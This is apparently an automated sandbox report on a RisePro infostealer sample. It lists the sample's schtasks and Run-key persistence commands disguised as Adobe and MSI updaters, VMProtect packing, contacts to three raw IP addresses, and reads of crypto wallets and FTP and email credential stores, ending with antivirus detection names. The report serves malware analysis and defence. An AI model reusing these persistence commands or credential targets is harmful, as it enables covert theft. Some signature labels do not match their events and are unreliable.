cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST

The executable is likely packed with VMProtect (3 events)

section	.vmp\xc2\xa4\xc2\xbb	description	Section name indicates VMProtect
section	.vmp\xc2\xa4\xc2\xbb	description	Section name indicates VMProtect
section	.vmp\xc2\xa4\xc2\xbb	description	Section name indicates VMProtect

Communicates with host for which no DNS query was performed (3 events)

host	193.233.132.197
host	5.42.65.117
host	5.42.66.22

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\AdobeUpdaterV168.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\AdobeUpdaterV168.exe
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000450 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA March 29, 2024, 7:43 a.m.	key_handle: 0x00000458 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.RisePro.i!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.tc
Cylance	unsafe
VIPRE	Application.Generic.3627139
Sangfor	Infostealer.Win32.Risepro.Vv3x
K7AntiVirus	Trojan ( 0059f91f1 )
BitDefender	Application.Generic.3627139
K7GW	Trojan ( 0059f91f1 )
Arcabit	Application.Generic.D375883
VirIT	Trojan.Win32.Genus.VLK
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.VMProtect.BC suspicious
APEX	Malicious
Avast	Win32:PWSX-gen [Trj]
Kaspersky	Trojan-PSW.Win32.RisePro.jzj
MicroWorld-eScan	Application.Generic.3627139
Emsisoft	Application.Generic.3627139 (B)
F-Secure	Trojan.TR/Redcap.czylj
DrWeb	Trojan.PWS.RisePro.76
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.9ffa99ae9f8ab00f
Sophos	Generic Reputation PUA (PUA)
Ikarus	Trojan.SuspectCRC
Google	Detected
Avira	TR/Redcap.czylj
MAX	malware (ai score=79)
Antiy-AVL	Trojan[Packed]/Win32.VMProtect
Kingsoft	Win32.PSWTroj.Undef.a
Gridinsoft	Malware.Win32.RisePro.tr
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	Trojan-PSW.Win32.RisePro.jzj
GData	Application.Generic.3627139
Varist	W32/ABRisk.UWGG-5184
AhnLab-V3	Trojan/Win.Injection.C5605919
BitDefenderTheta	Gen:NN.ZexaF.36802.@JW@amP0yRcG
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Panda	Trj/Chgt.AD
Rising	Trojan.Generic@AI.81 (RDML:+IYg8LGzBLSyJ1TnDhiqGg)
Yandex	Trojan.PWS.RisePro!EQ7zBjDO0dg
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	Riskware/Application
AVG	Win32:PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)
alibabacloud	VirTool:Win/Packed.VMProtect.BC

getimage15.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All